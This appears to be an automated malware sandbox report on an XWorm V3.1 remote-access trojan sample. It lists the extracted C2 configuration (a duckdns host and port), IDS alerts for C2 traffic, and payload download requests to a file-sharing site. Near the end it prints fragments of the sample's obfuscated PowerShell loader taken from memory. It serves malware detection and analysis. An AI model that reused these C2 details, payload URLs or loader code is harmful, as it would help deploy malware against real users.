              Source: 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.10:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.10:49719 version: TLS 1.2
              Source: Binary string: \??\C:\Program Files (x86)\windows mail\wab.PDB source: wab.exe, 0000000F.00000002.3136825596.0000000025368000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Configuration.pdb|c,s@ source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: Accessibility.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1682044928.0000000007C22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdb" source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbk8 source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: $%symbols\dll\mscorlib.pdbLb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: h1%HPRo0C:\Windows\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: ?^oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: 4%%%.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: 1%C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbhWa source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wab.pdbGCTL source: wab.exe, 0000000F.00000002.3136825596.000000002533F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: wab.pdb source: wab.exe, 0000000F.00000002.3136825596.000000002533F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbh source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025368000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\symbols\exe\wab.pdbK source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025341000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp, WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wab.pdbJ# source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Management.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb_ source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Management.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: @^o.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbr8 source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 \ source: wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb@@_ source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.202.180.134:8895 -> 192.168.2.10:49720
              Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.202.180.134:8895 -> 192.168.2.10:49720
              Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49720 -> 12.202.180.134:8895
              Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49720 -> 12.202.180.134:8895
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: nmds.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: nmds.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.10:49720 -> 12.202.180.134:8895
              Source: Joe Sandbox ViewIP Address: 69.31.136.17 69.31.136.17
              Source: Joe Sandbox ViewIP Address: 12.202.180.134 12.202.180.134
              Source: Joe Sandbox ViewIP Address: 104.21.28.80 104.21.28.80
              Source: Joe Sandbox ViewIP Address: 69.31.136.57 69.31.136.57
              Source: Joe Sandbox ViewASN Name: FISERV-INCUS FISERV-INCUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /pro/dl/ow9148 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n3.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/ougyql HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n4.sendspace.comConnection: Keep-AliveCookie: SID=5hrvd3jvoolunq5gv3jhegf975
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pro/dl/ow9148 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n3.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/ougyql HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n4.sendspace.comConnection: Keep-AliveCookie: SID=5hrvd3jvoolunq5gv3jhegf975
              Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs13n3.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs03n4.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: nmds.duckdns.org
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD435B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs13n3.sendspace.com
              Source: powershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Amcache.hve.23.drString found in binary or memory: http://upx.sf.net
              Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000000C.00000002.1675028556.0000000006D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD4357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.com/
              Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.com/A
              Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.0000000007591000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80
              Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.com/yK
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspaXpAk
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD41C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD41C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD41C52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD4357B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD4359C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb
              Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD42A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD43086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 0000000F.00000002.3121592482.0000000007558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 0000000F.00000002.3133396783.0000000022630000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.0000000007591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/ougyql
              Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/ow9148
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/ow9148P
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.10:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.10:49719 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_7776.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6851
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6875
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6851Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6875Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C193B8C23_2_00007FF7C193B8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C193AB5A3_2_00007FF7C193AB5A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C4E92812_2_00C4E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C4F1F812_2_00C4F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C4204512_2_00C42045
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C4E5E012_2_00C4E5E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C41FD512_2_00C41FD5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_22FDEB9815_2_22FDEB98
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772
              Source: amsi32_7776.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: powershell.exe, 00000003.00000002.1894282866.000002AD59D26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
              Source: powershell.exe, 00000003.00000002.1891586210.000002AD597E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aumludkiganemictsammeitangfvrekompinterrextraofla.bngenerosamstmanaphefrekvnsy doecap.irtu.slnrottee gast)acido ') ;mekhitarist (sideblikkets ' ofr.$sudatgpiro lfucoxoyver,bcl.staskovflnone,:collihsombruam itgdrbeloufornrberidmove,penontrbnuncgiun urdensom=attr $m1
              Source: powershell.exe, 00000003.00000002.1894282866.000002AD59D26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: erBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpefW
